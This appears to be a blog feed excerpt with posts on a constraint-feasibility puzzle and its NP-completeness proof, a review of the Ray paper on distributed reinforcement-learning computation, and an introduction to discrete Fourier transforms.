I also realize I’ve been studying things backwards :)</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli</li> <li>[<a href="https://dspillustrations.com/pages/posts/misc/linearity-causality-and-time-invariance-of-a-system.html">2</a>] Linearity, Causality and Time-Invariance of a System</li> <li>[<a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">3</a>] Discrete Fourier Transforms</li> </ul> <p>All the charts have been generated using Matplotlib, with the source code available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-08-31-discrete-time-filters/charts.ipynb">Jupyter notebook</a>.</p>Guilherme KunigamiIn this post we’ll learn about discrete filters, including definitions, some properties and examples.Maximum Non-Empty Intersection of Constraints2021-08-17T00:00:00+00:002021-08-17T00:00:00+00:00https://www.kuniga.me/blog/2021/08/17/max-non-empty-intersection <p>Here’s a puzzle I thought about recently: given a set of constraints of the form $ax \le b$, where $a, b \in \mathbb{R}$, find the maximum number of constraints we can choose such that there exists $x \in \mathbb{R}$ that satisfies all of them.</p> <p>For example, given $x \le 2$, $3x \le 7$, $-2x \le 1$, $-2x \le -9$, we can choose $x \le 2$, $3x \le 7$, $-2x \le 1$, then any $\frac{-1}{2} \le x \le 2$ satisfies all 3 of them. This also happens to be the maximum number of constraints we can choose.</p> <p>In this post we’ll explore a solution to this puzzle. Feel free to stop here and solve it before proceeding.</p> <!--more--> <h2 id="solution">Solution</h2> <p>We can simplify the problem a bit by normalizing the coefficient of $x$ so that all constraints are of either the $x \le a$ or the $x \ge a$ form. 
For example, $3x \le 7$ is normalized to $x \le \frac{7}{3}$ and $-2x \le 1$ to $x \ge -\frac{1}{2}$.</p> <p>The key observation is that in our solution we can’t have a pair $x \ge a$ and $x \le b$ if $b &lt; a$ since their intersection is already empty. This implies that in our solution, all the right-hand sides (RHS) of the “$\ge$” constraints will be smaller than or equal to the RHS of the “$\le$” constraints.</p> <p>Let’s sort the constraints by their RHS and break ties by having “$\ge$” show up before “$\le$” (since we could pick both $x \ge a$ and $x \le a$ for the intersection $x = a$).</p> <p>We now need to find the maximum number of “$\ge$” followed by “$\le$” constraints. Another way to frame this is: given a string of $0$s (corresponding to “$\ge$”) and $1$s (corresponding to “$\le$”), find a subsequence such that it starts with all $0$s and ends with all $1$s. In other words, it matches the regular expression <code class="language-plaintext highlighter-rouge">\0*1*\</code>, so this is the problem we’ll be solving now.</p> <h3 id="induction">Induction</h3> <p>Suppose our input is a string $s$ of length $n$. Let $s_i$ represent the $i$-th character ($i = 1, \cdots, n$) and $s_{i,j}$ the substring $s_i, \cdots, s_j$ ($1 \le i \le j \le n$). Let’s call any string satisfying the regex <code class="language-plaintext highlighter-rouge">\0*1*\</code> a <strong>valid</strong> string.</p> <p>Let $u_i$ be the length of the largest <em>valid</em> subsequence of $s_{1,i}$ that ends in $1$ and $z_i$ the length of the largest <em>valid</em> subsequence of $s_{1,i}$ that ends in $0$. The largest <em>valid</em> subsequence of $s$ has to end in either $0$ or $1$, so the solution to the problem is $\max(u_n, z_n)$.</p> <p>Since we cannot have a $1$ following a $0$, the only valid subsequence ending in $0$ is one with all $0$s, so $z_i$ is equivalent to how many $0$s there are in $s_{1,i}$.</p> <p>How about $u_i$? Suppose we know how to compute $u_k$ for $k &lt; i$. 
Then if $s_i = 0$, there’s nothing we can do to extend $u_i$, so $u_i = u_{i-1}$. Otherwise, we either add $1$ to the subsequence represented by $u_{i-1}$ or we add it to the one full of zeros in $z_{i-1}$.</p> <p>Why is that optimal? Suppose it’s not. Then there exists a valid subsequence whose length is greater than $\max(u_{i-1}, z_{i-1}) + 1$. If the second-to-last character of that subsequence is a $0$, we found a valid subsequence of $s_{1,i-1}$ longer than $z_{i-1}$; if it’s $1$, we found a valid subsequence of $s_{1,i-1}$ longer than $u_{i-1}$, thus in both cases we get a contradiction.</p> <h3 id="code">Code</h3> <p>We can solve this problem in $O(n)$ using constant extra memory since we only ever depend on the previous index:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">longest_valid</span><span class="p">(</span><span class="n">s</span><span class="p">):</span> <span class="n">z</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">u</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">s</span><span class="p">:</span> <span class="k">if</span> <span class="n">c</span> <span class="o">==</span> <span class="s">'0'</span><span class="p">:</span> <span class="n">z</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">else</span><span class="p">:</span> <span class="n">u</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span><span class="n">u</span><span class="p">,</span> <span class="n">z</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="k">return</span> <span class="nb">max</span><span class="p">(</span><span class="n">u</span><span class="p">,</span> <span class="n">z</span><span class="p">)</span></code></pre></figure> <p>This allows us to solve the original problem in $O(n \log n)$ (dominated by the sorting step).</p> <h2 id="generalizations">Generalizations</h2> <p>What if instead of $1$-d constraints we 
had $m$-dimensional ones? More formally, given a set of constraints</p> $a_{i, 1} x_1 + \cdots + a_{i, m} x_m \le b_i$ <p>for $i = 1, \cdots, n$, we want the largest subset of these constraints such that there exists $\vec{x} = x_1, \cdots, x_m$ satisfying all of them.</p> <p>Another way to frame it in terms of combinatorial optimization: given a Linear Program, what is the minimum number of constraints we need to remove to have a feasible solution?</p> <p>Removing a constraint is akin to relaxing the problem and we want to minimize the number of relaxations, so we’ll name our problem the <em>Least Relaxed Linear Program</em> or <em>LRLP</em> for short.</p> <h3 id="np-completeness">NP-Completeness</h3> <p>We’ll prove that LRLP is NP-Complete by reducing a known NP-Complete problem to it. Our choice is the <em>0-1 Integer Linear Program Feasibility</em>. Consider an Integer Linear Program (ILP) defined by the set of constraints</p> $(1) \quad A\vec{x} \le b$ <p>where $A$ is an $n \times m$ coefficient matrix of real values, $b$ is a vector in $\mathbb{R}^n$ and $\vec{x}$ is an $m$-vector of 0 or 1, i.e. $\vec{x} \in \curly{0, 1}^m$. The problem consists of deciding whether there exists any $\vec{x}$ satisfying these constraints.</p> <p>We can solve this problem by reducing to LRLP. We include the original constraints (1) but relax the 0-1 integrality constraints by having $\vec{x} \in \mathbb{R}^m$. 
We then add $2m$ new constraints:</p> $(2) \quad x_j = 1 \quad j = 1, \cdots, m$ $(3) \quad x_j = 0 \quad j = 1, \cdots, m$ <p>Recall that an equality constraint can be implemented by 2 inequalities.</p> <p>Now, if the original ILP has a feasible integer solution, then it’s a candidate solution to the target LRLP, satisfying all $n$ constraints in (1) plus exactly $m$ of the constraints between (2) and (3).</p> <p>Conversely, if the target LRLP can satisfy $n + m$ constraints (note this is an upper bound), it’s easy to construct a feasible integer solution to the original ILP.</p> <p>Hence, the original ILP has a feasible solution if and only if LRLP satisfies $n + m$ constraints.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2012/02/05/lagrangean-relaxation-theory.html">Lagrangean Relaxation - Theory</a>. This problem seems related to the Lagrangean Relaxation, in which we remove some of the constraints and add them to the objective function and penalize violated constraints. How good of a solution would we get if we relaxed all the constraints and tried to optimize it? In theory the multipliers would be real values, so we might end up picking fractions of constraints, but I wonder if in practice it would yield good approximations.</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://math.stackexchange.com/questions/2969290/maximizing-the-total-number-of-feasible-constraints-of-a-linear-program">1</a>] Mathematics - Maximizing the total number of feasible constraints of a linear program</li> </ul>Guilherme KunigamiHere’s a puzzle I thought about recently: given a set of constraints of the form $ax \le b$, where $a, b \in \mathbb{R}$, find the maximum number of constraints we can choose such that there exists $x \in \mathbb{R}$ that satisfies all of them. 
For example, given $x \le 2$, $3x \le 7$, $-2x \le 1$, $-2x \le -9$, we can choose $x \le 2$, $3x \le 7$, $-2x \le 1$, then any $\frac{-1}{2} \le x \le 2$ satisfies all 3 of them. This also happens to be the maximum number of constraints we can choose. In this post we’ll explore a solution to this puzzle. Feel free to stop here and solve it before proceeding.Paper Reading - Ray2021-08-04T00:00:00+00:002021-08-04T00:00:00+00:00https://www.kuniga.me/blog/2021/08/04/ray<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll discuss the paper <em>Ray: A Distributed Framework for Emerging AI Applications</em> by Moritz et al . Ray is a framework aimed at Reinforcement Learning (RL) applications.</p> <!--more--> <h2 id="background">Background</h2> <p>Since Ray is specifically targeted for RL applications, it’s worth going over RL briefly.</p> <h3 id="reinforcement-learning">Reinforcement Learning</h3> <p>Reinforcement Learning is one of the three machine learning paradigms  (in addition to supervised and unsupervised learning). It’s usually modeled as a Markov decision process (MDP).</p> <p>The model contains two entities: the agent and the environment.</p> <p>The <strong>environment</strong> represents the real world (or some simulator of it), for example, in self-driving cars, the real world is basically the input to all the sensors and cameras in the car. At any given moment the environment is in one of the states from $S$, which could be GPS coordinates and speed for example.</p> <p>The environment can take in an action from a set $A$ which will move it to another state. This process is called <strong>simulation</strong> since it will require either performing the action in the real world (speed the car up) or more likely simulating the outcome of the action to compute the resulting state. 
This transition is probabilistic, defined by $P_a(s, s’)$, that is the probability of transitioning from $s$ to $s’$ when action $a$ is performed.</p> <p>There is a <strong>reward</strong> associated with the transition from state $s$ to $s’$ when action $a$ is performed, $R_a(s, s’)$.</p> <p>The choice of action is performed based on a probability function $\pi$, called <strong>policy</strong>, defined as $\pi: A \times S \rightarrow [0, 1]$, where $\pi(a, s)$ represents the probability the action $a$ will be chosen when we’re in state $s$. This process is known as <strong>serving</strong>. This policy is the variable that the RL algorithm will modify.</p> <p>In an ideal world, we’d be able to tell the best action to perform from the environment either analytically or by simulating all possible actions, but in practice this is infeasible, hence we work with probabilistic functions.</p> <p>We can evaluate a policy against an environment, which we call <strong>rollout</strong>, by starting the environment from an initial state, then iteratively computing the action and getting the results (new state + reward) from the environment. The sequence of states and rewards resulting from this simulation is called <strong>trajectory</strong> and is the product of this function:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/pseudo-code-rollout.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 1: Pseudo-code for rollout.</figcaption> </figure> <p>Given a set of trajectories evaluated previously, the goal of the algorithm is to find the policy $\pi$ that maximizes the rewards across all trajectories. 
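The rollout loop can be sketched in plain Python. The `DummyEnv` and `DummyPolicy` classes below are hypothetical stand-ins for the interfaces implied by Figure 1, not part of Ray:

```python
import random

class DummyEnv:
    """Toy environment: the state is an integer counter; the reward is 1
    when the action matches the state's parity."""
    def initial_state(self):
        return 0

    def step(self, state, action):
        reward = 1.0 if action == state % 2 else 0.0
        return state + 1, reward

class DummyPolicy:
    """Toy policy: samples an action uniformly from {0, 1}."""
    def sample_action(self, state):
        return random.randint(0, 1)

def rollout(policy, env, steps):
    """Evaluate a policy against an environment, recording the trajectory."""
    trajectory = []
    state = env.initial_state()
    for _ in range(steps):
        action = policy.sample_action(state)      # serving
        state, reward = env.step(state, action)   # simulation
        trajectory.append((state, reward))        # trajectory entry
    return trajectory
```

Training would then repeatedly call `rollout` and adjust the policy based on the accumulated rewards.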
This optimization process is called <strong>training</strong>, and we keep repeating it until the policy converges.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/pseudo-code-train-policy.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 2: Pseudo-code for train_policy.</figcaption> </figure> <h2 id="requirements">Requirements</h2> <p>To tailor the system to RL applications, Ray combines the <em>Serving</em>, <em>Simulation</em> and <em>Training</em> steps within itself, for the sake of reducing latency.</p> <p>These steps vary in requirements: for example, performing an action might take a few milliseconds while training could take hours. It’s thus necessary to support <em>heterogeneous computation</em>, not only in terms of execution time but also hardware (GPUs, CPUs).</p> <p>Some <em>simulations</em> require state to be carried from one function to the next, thus the system should support <em>stateful computation</em>. In a similar vein, one function might spawn new functions to be executed, which cannot be known ahead of time, so the system should allow <em>dynamic execution</em>.</p> <p>It should also enable integrating with existing simulators and deep learning frameworks.</p> <p>After covering the architecture of the system, we’ll revisit these requirements to see how they’re satisfied.</p> <h2 id="components">Components</h2> <p>These are some high-level entities the system uses.</p> <h3 id="tasks-and-actors">Tasks and Actors</h3> <p>There are two types of remote function execution:</p> <ul> <li><strong>Task</strong> is <em>stateless</em></li> <li><strong>Actor</strong> is <em>stateful</em></li> </ul> <p>Both tasks and actors are executed by a remote worker. Both are non-blocking by default but the API provides a way to wait (i.e. block) for the computation to finish.</p> <p>It’s possible for remote functions to invoke other remote functions (nested remote calls). 
In addition, actors can be passed as parameters to remote functions, so their internal state can be reused.</p> <p>Perhaps we can make analogies with programming: tasks are pure functions and actors are instances of classes. A more precise description would be that actor <em>methods</em> are the stateful execution.</p> <h3 id="dynamic-task-graph">Dynamic Task Graph</h3> <p>The execution of both tasks and actor methods is automatically triggered by the system when their inputs become available. To know when this happens, Ray builds a DAG to track dependencies.</p> <p>Nodes in this graph can be data, tasks or actor methods. There are 3 types of edges:</p> <ul> <li><strong>Data</strong> (data → task) - when task depends on some data as input</li> <li><strong>Control</strong> (task → task) - nested remote calls</li> <li><strong>Stateful</strong> (actor method → actor method) - sequential calls of methods within the same actor</li> </ul> <p>This graph is <em>dynamic</em> in the sense that it changes during the execution of the program. As new tasks and actors are created, nodes and edges are added.</p> <h2 id="architecture">Architecture</h2> <p>There are three types of nodes in the system: worker nodes, global schedulers and the global control state (GCS). 
Figure 3 shows an example of a configuration of the nodes.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/components.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 3: Example configuration of workers, schedulers and GCS.</figcaption> </figure> <p>Let’s look at each of these node types in more detail.</p> <h3 id="worker-node">Worker Node</h3> <p>Within each worker node we have a few processes and storage.</p> <ul> <li>Driver - a process executing the user program (the non-remote functions)</li> <li>Worker - a process executing a task</li> <li>Actor - a stateful process executing methods from an actor</li> <li>Local scheduler - when a task is created inside this node, the local scheduler either executes it locally (by sending it to a worker), or, if the node is overloaded, delegates it to the global scheduler to route to a different node.</li> <li>Object store - stores the input/output of tasks</li> </ul> <p>Let’s cover the object store in more detail. It’s an in-memory storage shared between the worker processes in this node. The input to functions must be available in the object store before starting.</p> <p>Suppose a worker in node $N_1$ needs data $a$ to execute, but it doesn’t have it locally. It then asks the <em>global control state</em>, which knows which node, say $N_0$, has that input. Then $N_1$ copies the data directly from $N_0$ and stores it locally.</p> <p>Each object has an associated ID and is immutable (mutating the object means creating new IDs), thus keeping an object replicated in multiple places is safe from the consistency perspective. This mechanism of replicating the data also helps to distribute the load since if there is some hot data, it’s likely replicated in multiple nodes which the GCS can load-balance from.</p> <p><em>My comment:</em> One interesting aspect of Ray is that the process that executes the user program is co-located with the one that executes the heavy load. 
In other distributed execution systems I’ve seen, they’re separated, for example a client sending some SQL input to an engine which will execute it in a backend.</p> <h3 id="global-scheduler">Global Scheduler</h3> <p>As discussed in the previous section, the global scheduler is only used if the local scheduler in the node decides not to schedule a task locally, hence the paper calls this scheduling strategy <em>bottom-up</em> scheduling.</p> <p>The global scheduler uses a bunch of different criteria to determine which machine it will assign a task to, including:</p> <ul> <li>Estimated time the task will stay in the queue</li> <li>Transfer time (a function of input size and network bandwidth)</li> </ul> <p>The scheduler gets information like the tasks’ input from the GCS. It also probes a worker node to determine its queue size and resources via heartbeat.</p> <p><em>My question:</em> does it need to probe all nodes or only a subset of them?</p> <p>One thing that the scheduler does <strong>not</strong> do is <em>task dispatching</em>, i.e. retrieving the inputs for the task to execute. This is done by the GCS.</p> <p>By staying stateless it becomes easy to scale the global scheduler horizontally.</p> <h3 id="global-control-state-gcs">Global Control State (GCS)</h3> <p>The GCS holds the metadata of the system. As seen in Figure 3, it stores:</p> <ul> <li>Table of task metadata</li> <li>Table of object metadata - which node contains what object (data), note that all objects have an associated ID.</li> <li>The dynamic task graph</li> </ul> <p>It’s worth calling out that the GCS does not keep the actual data. It’s distributed across the worker nodes.</p> <p>The GCS is implemented using a sharded key-value store (one Redis per shard). Sharding is done by object and task IDs. Each shard uses chain-replication  for fault-tolerance.</p> <p><em>My question:</em> why not let Redis handle the sharding? 
Perhaps the system wants more control over the replication strategy?</p> <p>Periodically, GCS flushes the data to disk, both to keep memory usage capped and to serve as a snapshot for recovery.</p> <h2 id="results">Results</h2> <p>The paper provides a bunch of micro-benchmarks testing the performance of specific features, like end-to-end scalability, delays from GCS, tasks and actors’ fault-tolerance mechanisms, etc.</p> <p>It also compares the performance against multiple existing systems including Clipper, Horovod, OpenMPI, etc. And it outperforms them in many RL-specific tasks.</p> <p>Finally, it compares features and designs with some of the systems above as well, and points out where they fall short of efficiently meeting RL application requirements.</p> <h2 id="analysis">Analysis</h2> <p>As promised, we revisit the requirements from the Motivation section to see how they were addressed:</p> <ul> <li>Combines the Serving, Simulation and Training - it does it by having a single Python API for computing tasks and actors. It doesn’t distinguish between these steps.</li> <li>Support heterogeneous computation - tasks can be used for a variety of workloads and be run on different hardware. Coupled with the scheduler, which knows these requirements and the hardware settings, heterogeneous tasks can be modeled transparently.</li> <li>Support stateful computation - actors model this use case.</li> <li>Integrates with existing simulators and deep learning frameworks - by virtue of allowing arbitrary Python execution it can leverage existing libraries.</li> </ul> <h2 id="conclusion">Conclusion</h2> <p>I really like the idea of co-locating data with the execution node. 
This is a natural way to distribute the data and avoids a lot of the latency of storing it in a centralized database.</p> <p>I haven’t dealt with Reinforcement Learning before, so I’m sure I’m missing a lot of the details for the motivations behind this system, but I’m happy to have learned a bit about it and some other distributed concepts (in the Appendix).</p> <p>I originally thought Ray was a framework for general Python distributed computing and this is what motivated me to read the paper. Well, it might as well be, but I didn’t know about its strong focus on RL applications.</p> <h2 id="appendix">Appendix</h2> <p>Here we discuss some terminology and concepts I had to look up to understand the paper.</p> <h3 id="allreduce">Allreduce</h3> <p>Allreduce is a distributed protocol for nodes in a system to share their data among all the nodes, while consolidating (reducing) them in the process. One contrived example is one in which each node holds a number and the goal is for each node to hold the sum of the values from all nodes in the system.</p> <p>One naïve way to do this is to have each node send its data to all other nodes requiring $O(n^2)$ network transmissions, then adding the values received locally, but it’s possible to do it with $O(n)$ transmissions.</p> <p>This <a href="https://towardsdatascience.com/visual-intuition-on-ring-allreduce-for-distributed-deep-learning-d1f34b4911da">very informative article</a> by Edir Garcia Lazo provides a visual explanation of a popular implementation of the protocol called <em>ring allreduce</em>.</p> <h3 id="chain-replication">Chain-replication</h3> <p>The basic idea is to have a chain (or linked list) of storages $s_1, s_2, \cdots, s_N$, where writes are performed at $s_1$ (head) but reads are served from $s_N$ (tail). 
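The chain scheme can be illustrated with a toy in-memory sketch (my simplification, assuming synchronous propagation and ignoring acks, retries and failures):

```python
class ChainKV:
    """Toy chain replication: a list of dict 'storages', head first."""
    def __init__(self, n):
        self.nodes = [{} for _ in range(n)]

    def write(self, key, value):
        # Writes enter at the head (s_1) and propagate down the chain.
        for node in self.nodes:
            node[key] = value

    def read(self, key):
        # Reads are served by the tail (s_N): any value visible here
        # has necessarily been replicated on every node before it.
        return self.nodes[-1][key]
```

Reading only from the tail is what gives the consistency guarantee: a value becomes visible only after it has reached all replicas.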
When $s_i$ gets written to, it propagates the write to $s_{i+1}$.</p> <p>Once $s_N$ is written to, it sends an <em>ack</em> back to $s_{N-1}$, which in turn sends it to the previous node, all the way up to $s_1$.</p> <p>By reading from the tail we guarantee the data has been replicated in all nodes.</p> <p>When a node fails it can be removed as if we were removing a node from a linked list. Writes could be lost if they didn’t have a chance to be propagated.</p> <p>It’s interesting to note that when node $s_i$ fails, the pending acks from $s_{i+1}$ will now go to $s_{i-1}$ and from the perspective of the other nodes nothing happened. If node $s_i$ fails after receiving a write request but before sending it to $s_{i+1}$, that write would be lost, but node $s_{i-1}$ could have a retry mechanism if it didn’t receive an ack within some time.</p> <h3 id="lineage-storage">Lineage Storage</h3> <p>To recover from failure, systems usually persist data from memory to disk. The idea is to, from time to time, persist snapshots of the state of the system and also the exact steps performed since that snapshot was taken.</p> <p>One type of implementation, called <em>global checkpoint</em>, only relies on the snapshots, logging no steps. 
On recovery, it has to re-run the job from the latest checkpoint, and if the execution is non-deterministic, it might lead to different results.</p> <p>At the other extreme we have what’s known as <em>lineage</em>, which only logs the steps but no snapshots, so on recovery it needs to replay the whole computation .</p> <p>Steps can usually be logged more frequently than state snapshots because of the size, but for small tasks they might pose a bigger overhead.</p> <h3 id="parameter-server">Parameter Server</h3> <p>According to , <strong>parameter servers</strong>:</p> <blockquote> <p>store the parameters of a machine learning model (e.g., the weights of a neural network) and to serve them to clients (clients are often workers that process data and compute updates to the parameters)</p> </blockquote> <p>It’s usually implemented as a key-value store.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.usenix.org/system/files/osdi18-moritz.pdf">1</a>] Ray: A Distributed Framework for Emerging AI Applications</li> <li>[<a href="https://en.wikipedia.org/wiki/Reinforcement_learning">2</a>] Reinforcement learning</li> <li>[<a href="https://towardsdatascience.com/visual-intuition-on-ring-allreduce-for-distributed-deep-learning-d1f34b4911da">3</a>] Visual intuition on ring-Allreduce for distributed Deep Learning</li> <li>[<a href="https://ray-project.github.io/2018/07/15/parameter-server-in-fifteen-lines.html">4</a>] Implementing A Parameter Server in 15 Lines of Python with Ray</li> <li>[<a href="https://medium.com/coinmonks/chain-replication-how-to-build-an-effective-kv-storage-part-1-2-b0ce10d5afc3">5</a>] Chain replication: how to build an effective KV-storage</li> <li>[<a href="https://cs-people.bu.edu/liagos/material/sosp19.pdf">6</a>] Lineage Stash: Fault Tolerance Off the Critical Path</li> </ul>Guilherme KunigamiIn this post we’ll discuss the paper Ray: A Distributed Framework for Emerging AI Applications by Moritz et al . 
Ray is a framework aimed at Reinforcement Learning (RL) applications.Discrete Fourier Transforms2021-07-31T00:00:00+00:002021-07-31T00:00:00+00:00https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study three flavors of discrete Fourier transforms, the classic <em>Discrete Fourier Transform</em> but also <em>Discrete Fourier Series</em> and <em>Discrete-Time Fourier Transform</em>.</p> <p>We’ll focus on their mathematical rather than their physical interpretation and will come up with their formulas from linear algebra principles. Later we’ll also discuss the difference between each type of transform.</p> <!--more--> <h2 id="signals">Signals</h2> <p>Let’s review some basics of signals which will be necessary in later sections.</p> <p>But before we start, a note on notation: in signal processing, discrete time signals are often denoted as $x[t]$ as opposed to $x_t$ to distinguish from their continuous counterpart, which can be a bit confusing when mixing with mathematical notation from linear algebra. I’ll use the $x_t$ notation for consistency. When referring to the signal as a whole, we’ll use bold, $\vec{x}$.</p> <p><strong>0-based index:</strong> in mathematical notation we often start the array at index 1 but we’ll do a lot of arithmetic with the indexes so it’s convenient to start at 0.</p> <h3 id="signals-as-vectors">Signals as Vectors</h3> <p>Discrete-time signals can be naturally mapped to vectors if we take each timestamp as a dimension. For example, if $x_t$ represents amplitudes sampled at regular intervals from $t=0$ to $t=N-1$, then we have the vector $\vec{x} = [x_0, \cdots, x_{N-1}]$.</p> <p>Henceforth we’ll use signals and vectors interchangeably.</p> <h3 id="classes-of-signals">Classes of Signals</h3> <p>Let’s now consider some classes of signals. When $N$ is finite we have <strong>finite</strong> signals. 
Easy-peasy. When $N$ is infinite we have a few subdivisions:</p> <p><strong>Periodic</strong> when the signal has a repeating pattern and can be represented by:</p> $x_t = x_{t + kN} \qquad k \in \mathbb{Z}$ <p>where $N$ is the length of the period.</p> <p><strong>Aperiodic</strong> when there’s no periodicity in the signal, so it cannot be represented succinctly:</p> $\cdots, x_{-2}, x_{-1}, x_{0}, x_{1}, x_{2}, \cdots$ <p>Note that the signal is infinite on both sides.</p> <p><strong>Periodic extension</strong> when we convert a finite signal into an infinite periodic one by repeating it indefinitely. More formally, if $\vec{x}$ is a finite signal, we can obtain the periodic signal $\vec{y}$ as:</p> $y_t = x_{t \Mod N} \qquad t \in \mathbb{Z}$ <p><strong>Finite-support</strong> is another way to convert a finite signal into an infinite one, by “padding” the left and right with 0s, so if $\vec{x}$ is a finite signal, we can obtain the infinite signal $\vec{y}$ as:</p> $\begin{equation} y_t=\left\{ \begin{array}{@{}ll@{}} x_t, &amp; \text{if}\ 0 \le t \le N-1 \\ 0, &amp; \text{otherwise} \end{array}\right. 
\end{equation}$ <h3 id="properties">Properties</h3> <p><strong>Energy</strong> of a signal is defined as the sum of the squares of its amplitudes, that is</p> $E_x = \sum_{t \in \mathbb{Z}} \abs{x_t}^2$ <p>which is the square of the norm of the vector $\vec{x}$, that is, $\norm{\vec{x}}^2$.</p> <p>A signal has <strong>finite energy</strong> if $E_x &lt; \infty$, which as we saw in our <a href="https://www.kuniga.me/blog/2021-06-26-hilbert-spaces.html">Hilbert Spaces post</a>, is equivalent to $\vec{x}$ being a square summable sequence, that is $\vec{x} \in \ell^2$.</p> <h2 id="complex-exponentials">Complex Exponentials</h2> <p>We’ll focus on a specific signal defined as:</p> $x_t = A e^{i (\omega t + \phi)}$ <p>$A$ is a scaling factor and corresponds to the amplitude of the signal, $\omega$ is the frequency and $\phi$ is the initial phase.</p> <p>Note: in electrical engineering we often use $j$ for the imaginary unit of a complex number to disambiguate from the variable used to refer to current, $i$. 
I’ll stick to the math convention, $i$, since we do not deal with such ambiguity in this post.</p> <p>Using Euler’s identity, we can express it as</p> $x_t = A [\cos (\omega t + \phi) + i \sin(\omega t + \phi)]$ <p>The argument to $\cos()$ and $\sin()$ is given in radians, which can be seen as a revolution around a circle, $2\pi$ being a full revolution.</p> <p><strong>Periodicity.</strong> If we want $\cos(\omega t + \phi)$ to be periodic, we need to choose $\omega$ so that $\omega t$ will be a full revolution at some point, that is, it will be a multiple of $2\pi$ (note that we don’t need $\phi$ since it’s just the offset of the revolution).</p> <p>That is, we want $\omega t = 2\pi k$, $k \in \mathbb{Z}$ or</p> $t = \frac{2\pi k}{\omega}$ <p>Since $t \in \mathbb{Z}$, this is equivalent to saying that if $\omega$ divides $2\pi k$, then both $\cos (\omega t + \phi)$ and $\sin(\omega t + \phi)$ are periodic and so is $x_t$.</p> <p>If we plot a line chart with $t$ as the x-axis and $\cos (\omega t + \phi)$ as the y-axis, we’ll see points from a sinusoid. A more familiar term for $\phi$ is <em>offset</em> and for $\omega$, <em>step</em>. 
A simple Python snippet to generate data points is:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">ys</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">N</span><span class="p">):</span> <span class="n">ys</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">cos</span><span class="p">(</span><span class="n">t</span><span class="o">*</span><span class="n">step</span> <span class="o">+</span> <span class="n">offset</span><span class="p">))</span></code></pre></figure> <p>The following graph displays samples using $\phi = \pi/2$ and $\omega = \pi/10$ and $N = 100$:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-07-31-dft/cos.png" alt="Chart with samples from cosine function" /> <figcaption>Figure 1: Samples from cosine function</figcaption> </figure> <h3 id="complex-values">Complex values</h3> <p>What does a complex number refer to in the real world? The insight provided by  is that $\mathbb{C}$ is just a convenient way to represent 2 real-valued entities. We could have worked with $\mathbb{R}^2$ all along, but the relationship between the two entities is such that complex numbers and all the machinery around them work neatly for signals.</p> <p>We can visualize this in 3d, two dimensions representing the components of the signal value and the third representing time:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-07-31-dft/heyser-corkscrew.png" alt="3d Line chart: Heyser Corkscrew" /> <figcaption>Figure 2: Heyser Corkscrew by A. 
Duncan .</figcaption> </figure> <h2 id="discrete-fourier-transform">Discrete Fourier Transform</h2> <h3 id="fourier-basis">Fourier Basis</h3> <p>We’ll now define a basis for the space $\mathbb{C}^N$ using the complex exponential signals described above.</p> <p>Let $\vec{u}^{(k)}$ be a family (indexed by $k$) of finite complex exponential signals defined by:</p> $u_t^{(k)} = e^{i \omega_k t} \qquad t = 0, \cdots, N-1$ <p>We want each member of the family to have a different $\omega_k$. We’ll now see how to obtain $N$ such values.</p> <p>The key point is that we will use this finite signal to generate an infinite periodic one via the periodic extension, in which case the $N$-th element should be the same as the $0$-th:</p> $u_0^{(k)} = u_N^{(k)} = e^{i \omega_k 0} = 1$ <p>We can then write:</p> $u_N^{(k)} = (e^{i \omega_k})^N = 1$ <p>This is the equation for a <a href="https://en.wikipedia.org/wiki/Root_of_unity">root of unity</a>, that is, a complex number that yields 1 when raised to some power $N$.</p> <p>For this case in particular, there are $N$ possible values satisfying this equation, namely:</p> $e^{\frac{i 2\pi m}{N}} \qquad m = 0, \cdots, N-1$ <p>So we can choose $\omega_k = \frac{2 \pi k}{N}$ and obtain $N$ distinct values. 
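We can sanity-check numerically that these are $N$ distinct roots of unity, e.g. for $N = 8$ (a quick check I'm adding, not part of the derivation):

```python
import cmath
import math

N = 8
# The N candidate values e^{i 2 pi k / N} for k = 0, ..., N-1.
roots = [cmath.exp(2j * math.pi * k / N) for k in range(N)]

# Each value raised to the N-th power returns to 1...
assert all(abs(r**N - 1) < 1e-9 for r in roots)

# ...and the N values are pairwise distinct.
rounded = {complex(round(r.real, 9), round(r.imag, 9)) for r in roots}
assert len(rounded) == N
```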
